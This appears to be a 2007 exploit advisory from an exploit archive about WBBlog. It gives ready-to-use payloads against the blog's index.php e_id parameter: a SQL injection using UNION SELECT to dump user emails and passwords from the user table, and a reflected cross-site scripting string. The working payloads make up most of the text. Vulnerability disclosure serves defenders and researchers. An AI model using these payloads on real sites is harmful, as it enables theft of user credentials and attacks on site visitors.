WBBlog (XSS-SQL) Multiple Remote Vulnerabilities

2007-03-15 00:00:00

======================x=o=r=o=n=====================

WBBlog (XSS/SQL) Multiple Remote Vulnerabilities

======================x=o=r=o=n=====================

Bulan: xoron

xoron.biz

======================x=o=r=o=n=====================

SQL INJ:

index.php?cmd=viewentry&e_id=-1/**/UNION/**/SELECT/**/null,null,u_email,null,u_password,null/**/FROM/**/user/*

XSS :

index.php?cmd=viewentry&e_id="><script>alert('HACKED')</script>

======================x=o=r=o=n=====================

Vendor Site: http://liqua.com/wbblog.html

======================x=o=r=o=n=====================

Thnx: pang0

======================x=o=r=o=n=====================

#

Fixes

No fixes

In order to submit a new fix you need to be registered.